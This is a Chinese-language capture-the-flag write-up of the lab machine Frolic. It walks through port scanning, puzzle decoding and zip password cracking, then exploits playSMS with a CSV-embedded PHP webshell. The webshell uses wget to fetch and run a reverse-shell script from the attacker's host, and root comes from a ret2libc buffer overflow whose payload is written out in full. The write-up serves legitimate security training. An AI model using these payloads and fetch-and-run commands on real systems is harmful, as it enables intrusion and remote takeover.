信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.111 | TCP:21,22,53,80,139.443.445 |
$ nmap -p- 10.10.10.111 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open http Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h58m33s, deviation: 3h10m28s, median: -8m35s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2024-08-01T20:05:24+05:30
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-08-01T14:35:25
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
HTTP
$ gobuster dir -u "http://10.10.10.111:9999" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图](https://img.4awl.net/img/a0/274520edbb833962e5aaf91b327c09.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图")
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图1](https://img.4awl.net/img/65/b50bc4e84fd80f21a055c6e2f06a40.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图1")
http://10.10.10.111:9999/admin/success.html文件中存在一段密文
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图2](https://img.4awl.net/img/5c/ca504f76fdf220b9e6de45a7cb3099.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图2")
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图3](https://img.4awl.net/img/a9/849bbfaf3523af3fcf555f2fd2f52d.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图3")
https://www.splitbrain.org/_static/ook/
Nothing here check /asdiSIAJJ0QWE9JAS
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图4](https://img.4awl.net/img/33/1d0ee3cdccf1016519ea034625ca29.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图4")
http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图5](https://img.4awl.net/img/26/14d82d70e93018c4035ad167561076.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图5")
$ echo "UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA"|base64 -d >out
zip密码爆破
$ binwalk out
$ unzip out
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图6](https://img.4awl.net/img/d0/56e0134d3feb266a05d04117776a04.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图6")
$ zip2john out >hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图7](https://img.4awl.net/img/f7/c8dbc1fea5155d07bd32649e5c82bc.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图7")
$ unzip out
$ cat index.php
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图8](https://img.4awl.net/img/2b/025aac58ae7c27f7216b91aefcc625.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图8")
$ echo "4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a" | xxd -r -p
$ echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg=="|base64 -d
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图9](https://img.4awl.net/img/5f/9da2ee88ae9df0798ea1b0a5f17f5d.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图9")
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图10](https://img.4awl.net/img/88/b05f73cf694a80b71209b98c54083e.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图10")
Play-SMS-Upload-RCE
$ gobuster dir -u "http://10.10.10.111:9999/dev/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图11](https://img.4awl.net/img/35/2c2452e27dd6352dd646cf9b6ce114.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图11")
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图12](https://img.4awl.net/img/b7/48ab05a17ff1832b4343adccc7c06d.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图12")
http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_auth&route=login
admin:idkwhatispass
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图13](https://img.4awl.net/img/45/8732cb7d42ce199a0ff7322f3cfe21.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图13")
https://www.exploit-db.com/exploits/42044
构造恶意csv文件
Name,Mobile,Email,Group code,Tags
<?php system($_GET[1]); ?>,x,,,
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图14](https://img.4awl.net/img/26/42419a17cb80e67dc4b647ffdf96b0.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图14")
http://10.10.10.111:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
导入上传csv
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图15](https://img.4awl.net/img/3e/c4a3667e55cedd347b0cff86cb1fe7.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图15")
http://10.10.10.111:9999/playsms/index.php?1=ls&app=main&inc=feature_phonebook&op=phonebook_list
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图16](https://img.4awl.net/img/de/3789ee843065f528c8f4ee256cefe8.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图16")
http://10.10.10.111:9999/playsms/index.php?1=cd%20/dev/shm;wget%20http://10.10.16.14/reverse.sh&app=main&inc=feature_phonebook&op=phonebook_list
http://10.10.10.111:9999/playsms/index.php?1=chmod%20%2Bx%20/dev/shm/reverse.sh;ls%20-la%20/dev/shm&app=main&inc=feature_phonebook&op=phonebook_list
http://10.10.10.111:9999/playsms/index.php?1=/dev/shm/reverse.sh&app=main&inc=feature_phonebook&op=phonebook_list
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图17](https://img.4awl.net/img/75/86242acbaa0087dad553f951010f12.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图17")
User.txt
db1f9faf35355d61d1c9892e34e5ebe4
权限提升
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图18](https://img.4awl.net/img/4e/4c5999b7fdc97b69f2e97afa71bb99.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图18")
www-data@frolic:/tmp$ file /home/ayush/.binary/rop
www-data@frolic:/tmp$ cp /home/ayush/.binary/rop /var/www/html
$ wget http://10.10.10.111:9999/rop;chmod +x rop
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图19](https://img.4awl.net/img/b9/a3528bfaa62d40a87b850b6b03d84e.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图19")
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图20](https://img.4awl.net/img/79/a4107ce4c43ffef3ff948a07e361ec.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图20")
www-data@frolic:~/html$ cat /proc/sys/kernel/randomize_va_space
查询ASLR地址随机化状态后发现关闭
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图21](https://img.4awl.net/img/30/d6449211c6a0411dd05efeda26fdec.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图21")
$ gdb -q ./rop
$ gdb-peda$ checksec
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图22](https://img.4awl.net/img/11/edeefe09d033872ca8f7a2404a8690.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图22")
gdb-peda$ pattern_create 1000
gdb-peda$ run 'A......'
gdb-peda$ pattern_offset 0x41474141
缓冲区溢出大小为52字节
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图23](https://img.4awl.net/img/aa/bd618be3cb45ee07dcc0f401b7f2e9.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图23")
gdb-peda$ run $(python2 -c 'print "A"*52+"B"*4')
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图24](https://img.4awl.net/img/79/1988a0c1ff3e936f31ebdc582059de.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图24")
ROP
通过分析共享库中的函数和字符串地址,你可以构造一个有效的ROP链来执行任意代码(如调用system("/bin/sh"))。
www-data@frolic:/home/ayush/.binary$ ldd rop
可以看到程序运行时被映射到的内存地址是0xb7e19000
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图25](https://img.4awl.net/img/98/93a074e93c6e0ce7496c09428914a6.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图25")
计算函数偏移量
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@"
0003ada0
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@"
0002e9d0
www-data@frolic:/home/ayush/.binary$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15ba0b
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图26](https://img.4awl.net/img/34/57542af8b04aadff6e9e6ba3e76a56.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图26")
$ echo | awk '{printf "0x%X\n", 0xb7e19000 + 0x0003ada0}'
system:0xB7E53DA0
$ echo | awk '{printf "0x%X\n", 0xb7e19000 + 0x15ba0b}'
/bin/sh:0xB7F74A0B
$ echo | awk '{printf "0x%X\n", 0xb7e19000 + 0x0002e9d0}'
exit:0xB7E479D0
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图27](https://img.4awl.net/img/52/15ac821433dbaee8f6f00622a23c22.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图27")
ROP: BUFF + SYSTEM + EXIT + /bin/sh.
www-data@frolic:/home/ayush/.binary$ ./rop $(python2 -c 'print("A"*52 + "\xA0\x3D\xE5\xB7" + "\xD0\x79\xE4\xB7" + "\x0B\x4A\xF7\xB7")')
![[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图28](https://img.4awl.net/img/3f/2c458990ec3f561363c830a09c552e.jpg "[Meachines] [Easy] Frolic zip密码爆破+Ook!密文解密+Play-SM…插图28")
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
